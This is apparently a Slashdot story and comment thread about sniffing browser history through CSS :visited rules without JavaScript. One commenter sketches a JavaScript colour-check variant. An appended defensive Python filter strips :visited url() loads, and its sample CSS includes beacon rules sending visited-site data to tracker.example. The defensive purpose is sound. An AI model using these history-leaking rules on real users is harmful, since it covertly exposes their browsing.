Sniffing Browser History Without Javascript
Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."
... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word, i.e., clever).
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!
I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc., for each site I visit via the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window": well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.
now we need to go OSS in diesel cars
It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality altogether. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.
If a page has the rule: a:visited { color: red; }
And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');
I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.
The point here is, the solution is not dead simple.
On the surface it seems like NoScript had descended to the point of malware, but take a look into the history of why Giorgio did what he did and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely, specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.
Yes, there needs to be a more trustworthy NoScript, but at the same time there also needs to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.
I, personally, have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.
Alternatively, make browsers download all the pseudoclasses for links, so that it is impossible for sites to use this to track users, but without removing the utility of having marked "visited" links. This could be done by browsers without needing any change to the standards, AFAICT.
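A defensive counterpart to the CSS trick described in the summary and to the filtering-proxy approach mentioned above, as an added example that is not part of this thread or of any of the tools named in it: a small Python filter, of the kind a rewriting proxy could apply to stylesheets, that flags and strips url() loads from any :visited rule while leaving ordinary :visited colouring intact. The sample stylesheet and the tracker.example URLs are constructed for the example.

```python
import re

# Constructed sample stylesheet (not from any real site): a harmless :visited
# colour rule, a benign image rule, and two :visited rules whose "background"
# is really a per-link logging beacon, the pattern the summary describes.
SAMPLE_CSS = """
a:visited { color: purple; }
#logo { background: url(/static/logo.png); }
#l1:visited { background: url("http://tracker.example/log?site=slashdot"); }
a.chk:visited{background-image:url(http://tracker.example/log?site=example)}
"""

# Flat "selector { declarations }" rules; nested blocks such as @media are
# not handled by this simple matcher (assumption: plain, unnested CSS).
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)


def strip_comments(css: str) -> str:
    return re.sub(r"/\*.*?\*/", "", css, flags=re.S)


def find_visited_beacons(css: str) -> list:
    """Return (selector, url) for every url() that sits inside a :visited rule.

    Any network fetch conditioned on :visited reveals history, so each hit is
    worth logging by a proxy or auditing tool, whatever property carries it.
    """
    hits = []
    for sel, body in RULE_RE.findall(strip_comments(css)):
        if ":visited" not in sel.lower():
            continue
        for url in URL_RE.findall(body):
            hits.append((sel.strip(), url))
    return hits


def sanitize_css(css: str) -> str:
    """Drop every declaration containing url() from :visited rules only.

    Rules without :visited, and url()-free :visited declarations such as
    colour changes, pass through unchanged, so 'visited' links stay marked.
    """
    def fix(m):
        sel, body = m.group(1), m.group(2)
        if ":visited" not in sel.lower():
            return m.group(0)
        kept = [d.strip() for d in body.split(";")
                if d.strip() and not URL_RE.search(d)]
        return "%s{ %s }" % (sel, "; ".join(kept))
    return RULE_RE.sub(fix, strip_comments(css))
```

Run find_visited_beacons(SAMPLE_CSS) to see the two beacon rules reported, and sanitize_css(SAMPLE_CSS) to get the stylesheet with those loads removed.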